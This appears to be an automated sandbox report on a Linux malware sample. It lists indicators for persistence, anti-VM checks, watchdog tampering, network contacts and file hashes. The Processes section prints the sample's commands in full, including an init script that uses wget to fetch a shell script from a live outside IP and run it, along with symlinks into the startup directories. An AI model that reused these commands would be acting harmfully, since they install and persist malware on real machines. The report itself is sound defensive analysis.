Malware Analysis Report

2025-05-28 20:29

Sample ID 241125-k7m8hsyrgx
Target 19991040084.zip
SHA256 35cd367a1fb9c6d29e748b51e42ed8ceee321a1f874aafacc4af3e663049234f
Tags antivm defense_evasion discovery persistence privilege_escalation
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score 10/10

SHA256 35cd367a1fb9c6d29e748b51e42ed8ceee321a1f874aafacc4af3e663049234f

Threat Level: Known bad

The file 19991040084.zip was found to be: Known bad.

Malicious Activity Summary

antivm defense_evasion discovery persistence privilege_escalation

yara_template

File and Directory Permissions Modification

Modifies Watchdog functionality

Checks mountinfo of local process

Creates/modifies environment variables

Modifies init.d

Modifies rc script

Modifies systemd

Modifies Bash startup script

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-11-25 09:14

Signatures

yara_template

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-11-25 09:14
Reported 2024-11-25 09:17
Platform ubuntu2404-amd64-20240729-en
Max time kernel 148s
Max time network 128s

Command Line

[/tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911]

Signatures

File and Directory Permissions Modification

defense_evasion
Description | Indicator | Process | Target
N/A | N/A | /bin/sh | N/A
N/A | N/A | /usr/bin/chmod | N/A
N/A | N/A | /bin/sh | N/A
N/A | N/A | /usr/bin/chmod | N/A
N/A | N/A | /bin/sh | N/A

Modifies Watchdog functionality

defense_evasion
Description | Indicator | Process | Target
File opened for modification | /dev/watchdog | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A
File opened for modification | /dev/misc/watchdog | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A

Checks mountinfo of local process

antivm
Description | Indicator | Process | Target
File opened for reading | /proc/2655/mountinfo | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A

Creates/modifies environment variables

persistence privilege_escalation defense_evasion
Description | Indicator | Process | Target
File opened for modification | /etc/profile | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A

Modifies init.d

persistence
Description | Indicator | Process | Target
File opened for modification | /etc/init.d/system | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A
File opened for modification | /etc/init.d/sh | /bin/sh | N/A

Modifies rc script

persistence
Description | Indicator | Process | Target
File opened for modification | /etc/rc.local | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A

Modifies systemd

persistence privilege_escalation
Description | Indicator | Process | Target
File opened for modification | /etc/systemd/system/custom.service | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A

Modifies Bash startup script

persistence
Description | Indicator | Process | Target
File opened for modification | /etc/profile | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A

Changes its process name

Description | Indicator | Process | Target
Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A

Reads runtime system information

discovery
Description | Indicator | Process | Target
File opened for reading | /proc/self/status | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A
File opened for reading | /proc/1/cgroup | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A
File opened for reading | /proc/filesystems | /usr/bin/systemctl | N/A
File opened for reading | /proc/filesystems | /usr/bin/mkdir | N/A

Processes

/tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911

[/tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911]

/bin/sh

[sh -c systemctl enable custom.service >/dev/null 2>&1]

/usr/bin/systemctl

[systemctl enable custom.service]

/bin/sh

[sh -c chmod +x /etc/init.d/system >/dev/null 2>&1]

/usr/bin/chmod

[chmod +x /etc/init.d/system]

/bin/sh

[sh -c ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1]

/usr/bin/ln

[ln -s /etc/init.d/system /etc/rcS.d/S99system]

/bin/sh

[sh -c echo "#!/bin/sh # /etc/init.d/sh case \"$1\" in start) echo 'Starting sh' /bin/sh & wget http://193.143.1.70/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) $0 stop $0 start ;; *) echo \"Usage: $0 {start|stop|restart}\" exit 1 ;; esac exit 0" > /etc/init.d/sh]

/bin/sh

[sh -c chmod +x /etc/init.d/sh >/dev/null 2>&1]

/usr/bin/chmod

[chmod +x /etc/init.d/sh]

/bin/sh

[sh -c mkdir -p /etc/rc.d >/dev/null 2>&1]

/usr/bin/mkdir

[mkdir -p /etc/rc.d]

/bin/sh

[sh -c ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1]

/usr/bin/ln

[ln -s /etc/init.d/sh /etc/rc.d/S99sh]

Network

Country | Destination | Domain | Proto
N/A | 224.0.0.251:5353 | | udp
US | 154.216.19.139:199 | | tcp
US | 154.216.19.139:199 | | tcp
US | 154.216.19.139:199 | | tcp
RU | 193.143.1.70:38242 | | tcp
US | 166.221.116.6:23 | | tcp
JP | 126.40.23.30:23 | | tcp
DE | 94.219.168.205:23 | | tcp
SG | 170.165.2.86:23 | | tcp
NL | 83.96.228.126:23 | | tcp
JP | 202.244.30.63:23 | | tcp
US | 162.236.109.110:23 | | tcp
UA | 95.133.98.202:23 | | tcp
LT | 158.129.189.242:23 | | tcp
CA | 20.116.227.186:23 | | tcp
US | 12.248.212.11:23 | | tcp
QA | 89.211.5.75:23 | | tcp
US | 32.107.0.197:23 | | tcp
CA | 64.10.68.86:23 | | tcp
GB | 2.123.80.70:23 | | tcp
US | 169.94.192.89:23 | | tcp
TH | 115.87.169.192:23 | | tcp
US | 66.94.65.23:23 | | tcp
US | 7.223.141.230:23 | | tcp
US | 50.168.146.255:23 | | tcp
DE | 2.174.123.99:23 | | tcp
TW | 34.81.97.21:23 | | tcp
US | 153.59.50.201:23 | | tcp
US | 170.97.182.53:23 | | tcp
IT | 45.205.17.68:23 | | tcp
US | 71.26.7.137:23 | | tcp
KR | 169.217.198.60:23 | | tcp
US | 168.207.146.101:23 | | tcp
TW | 111.252.41.220:23 | | tcp
US | 134.150.237.12:23 | | tcp
JP | 210.88.114.210:23 | | tcp
GB | 109.234.225.10:23 | | tcp
GB | 90.214.188.164:23 | | tcp
JP | 118.236.246.228:23 | | tcp
US | 55.185.57.127:23 | | tcp
CN | 113.87.157.50:23 | | tcp
US | 76.86.186.216:23 | | tcp
JP | 126.24.240.187:23 | | tcp
US | 97.99.30.139:23 | | tcp
FR | 195.220.72.202:23 | | tcp
US | 130.207.137.55:23 | | tcp

Files

/etc/systemd/system/custom.service

MD5 19a440fdac7f578f2fb33719698a082c
SHA1 ebadce21c65d05ad62a324deb39c57aecd3edf2c
SHA256 b176d41b748466f8ba35246c78a1c940f65403b363c086ccd5b5de577a87cf69
SHA512 8bdfac90e7235fc35eeec141a1e2145ed4ea5a250b71bdf0cf0e5e5aa59ab6dc004dc08561bd5547c4a4a106138c98950dc2098c905ce785b9b2c0657684d7bb

/etc/inittab

MD5 3d6b6e1b05ad5d0538ccd8804bcd279b
SHA1 0fc061b51c225d5bea072c939de05e8a856558bc
SHA256 cab2df9c1c498df29445837610f14ae08d4af98d3acac69b0581c01fe594e3c5
SHA512 1957857cffbc0d526eb04e40db166d661b9dc59fc31fb5551f31cd58d270f839ffa2098e81c8555b12e9dbd55ba17df662b14c6441a6389eb9a76082fa401c98

/boot/bootcmd

MD5 735cae7d3cbab0f59d95f84790282103
SHA1 1cb77931b3097f18988016c9ceba3280a5ccb2ae
SHA256 dfdd4cf729384e4ed52516ab72bd86be286c80f53d4f5b764fd2dd2a2b2c983b
SHA512 998daa467c4ee63dd41515897728de70cbb9c579ca8b16c26d8e6db5edad53c6dbd6343fb10eda3dbc29b0cb1fa72a9b2653250e9027e6ee02d17726e958bbfe

/etc/init.d/system

MD5 f000251d92c773cc3ee1ca22cf5f0788
SHA1 e2386fe6a5f29b1e9e5ad5b38928c024f97105e6
SHA256 31a77745dd3724a0691a9255738b9c87516868932e3eb992e2afafcd0574a985
SHA512 0dad5adaa7742dd208596fefad53ab21c39fbf2cbe5c9958b92170d555d316f0a0b02ec5236311b869aa18e90592e81439a3a229bf1307b5daf87d87c5f493c2

/etc/init.d/sh

MD5 c5583b6a699f62cb0a004c99842f5c70
SHA1 b232ef89bf9b36643b5956aaacfd295b9ce2a0a7
SHA256 2b03c83558e4af71f3b35408cf668a2ee06931c21adec760952a21a11bc4c59b
SHA512 a9fc1e4c30452a3d100a8ccfbb707d9d323830fbbca90c98d3c126bf943539baaf1fccb04d435a4b627ed7f1bfb1bbd649dab282488d951dde87e097423e154d

/etc/motd

MD5 2bd9b4be30579e633fc0191aa93df486
SHA1 7d63a9bd9662e86666b27c1b50db8e7370c624ff
SHA256 64dc39f3004dc93c9fc4f1467b4807f2d8e3eb0bfa96b15c19cd8e7d6fa77a1d
SHA512 ae6dd7b39191354cf43cf65e517460d7d4c61b8f5c08e33e6ca3c451dc7cab4de89f33934c89396b80f1aade0a4e2571bd5ae8b76ef80b737d4588703d2814d5